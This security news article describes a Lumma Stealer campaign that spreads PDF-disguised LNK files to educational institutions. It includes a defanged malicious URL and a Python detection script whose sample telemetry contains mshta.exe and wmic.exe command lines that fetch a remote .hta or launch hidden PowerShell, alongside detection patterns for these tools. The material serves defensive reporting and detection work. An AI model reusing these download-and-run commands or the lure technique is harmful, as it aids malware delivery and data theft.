A recent cybersecurity investigation has uncovered a malicious campaign leveraging the Lumma Stealer malware, a potent information-stealing tool distributed through a Malware-as-a-Service (MaaS) model.
This campaign specifically targets educational institutions by exploiting their infrastructure to distribute weaponized LNK files disguised as PDF documents.
The attack not only compromises sensitive data but also demonstrates the increasing sophistication of cybercriminal tactics.
The Lumma Stealer campaign employs malicious LNK files masquerading as legitimate PDFs, such as school fee structures or academic materials.
These files are hosted on compromised WebDAV servers, such as “http://87[.]120[.]115[.]240/Downloads/254-zebar-school-for-children-thaltej-pro-order-abad-rural.pdf.lnk.”
When unsuspecting users click on these files, they initiate a multi-stage infection process.
This begins with the execution of PowerShell commands to download additional payloads, ultimately deploying the Lumma Stealer malware on the victim’s system.
Once installed, Lumma Stealer targets sensitive information, including passwords, browser data, cryptocurrency wallets, and even specific file types like “wallet.txt” or “seed.txt.”
The stolen data is then exfiltrated to command-and-control (C2) servers. Notably, the malware employs advanced evasion techniques, such as leveraging Steam profiles for C2 communication.
By embedding decryption keys in Steam URLs and using Caesar cipher methods, the malware cloaks its operations within a trusted platform.
Educational Institutions: A Prime Target
Educational institutions have become attractive targets for cybercriminals due to their vast repositories of sensitive data and often less robust cybersecurity measures.
This campaign underscores how attackers exploit these vulnerabilities to infiltrate networks and distribute malware across industries like academia, healthcare, finance, and technology.
The reliance on remote learning and digital platforms has further expanded the attack surface, making schools particularly susceptible.
Technical Insights into the Attack
The infection chain begins with users downloading malicious LNK files disguised as PDFs.
These files execute PowerShell commands via legitimate Windows binaries like mshta.exe and wmic.exe, bypassing traditional security mechanisms.
The embedded scripts are obfuscated using techniques such as AES encryption and mathematical operations to evade detection.
The final payload, Lumma Stealer, is downloaded from remote servers and executed as “Kompass-4.1.2.exe.”
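The chain described above (a shortcut with a document-like double extension, then mshta.exe or wmic.exe reaching out to a remote URL or invoking PowerShell) is straightforward to triage from endpoint telemetry. The following is an added example, not code from the original report; the events, paths and IP address are constructed placeholders:

```python
import re

# Constructed sample telemetry modelled on the described chain; the filename,
# IP address and command lines are placeholders, not indicators from the report.
SAMPLE_EVENTS = [
    {"type": "file", "path": r"C:\Users\staff\Downloads\fee-structure-2024.pdf.lnk"},
    {"type": "file", "path": r"C:\Users\staff\Downloads\syllabus.pdf"},
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://198.51.100.7/Downloads/stage2.hta",
     "parent": "explorer.exe"},
    {"type": "process", "image": r"C:\Windows\System32\wbem\wmic.exe",
     "cmdline": 'wmic.exe process call create "powershell.exe -w hidden -c <redacted>"',
     "parent": "mshta.exe"},
    {"type": "process", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt", "parent": "explorer.exe"},
]

# A shortcut whose name ends in a document extension followed by .lnk is the
# lure pattern from the campaign (Explorer hides the trailing .lnk by default).
DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|jpe?g|png)\.lnk$", re.IGNORECASE)
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
# Living-off-the-land binaries named in the article as PowerShell launchers.
LOLBINS = {"mshta.exe", "wmic.exe"}


def classify(event):
    """Return a list of finding strings for one event; empty means no concern."""
    findings = []
    if event["type"] == "file":
        if DOUBLE_EXT.search(event["path"]):
            findings.append("double-extension shortcut posing as a document")
    elif event["type"] == "process":
        image = event["image"].rsplit("\\", 1)[-1].lower()
        if image in LOLBINS:
            if REMOTE_URL.search(event["cmdline"]):
                findings.append(f"{image} launched with a remote URL")
            if "powershell" in event["cmdline"].lower():
                findings.append(f"{image} invoking PowerShell")
            if event["parent"].lower() in LOLBINS:
                findings.append(f"{image} spawned by {event['parent']}")
    return findings


def triage(events):
    """Map each suspicious event (by path or command line) to its findings."""
    return {e.get("path") or e["cmdline"]: f for e in events if (f := classify(e))}
```

In a real deployment the same logic would run over Sysmon event ID 1 (process creation) and ID 11 (file creation) records rather than the inline sample.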
Once operational, Lumma Stealer scans for specific keywords in system directories to extract sensitive information.
According to the CloudSEK report, it also communicates with multiple C2 domains to exfiltrate data.
If these domains are inaccessible, the malware defaults to using Steam profiles for stealthy communication.
The Lumma Stealer campaign highlights the growing sophistication of MaaS platforms that enable even novice threat actors to launch complex attacks.
Educational institutions must prioritize cybersecurity by implementing robust defenses, including endpoint detection systems, regular vulnerability assessments, and user awareness training to recognize phishing attempts.
As this campaign demonstrates, weaponized PDFs remain a highly effective vector for malware distribution.
Organizations across all sectors must remain vigilant against evolving threats that exploit trusted file formats and platforms to compromise sensitive information.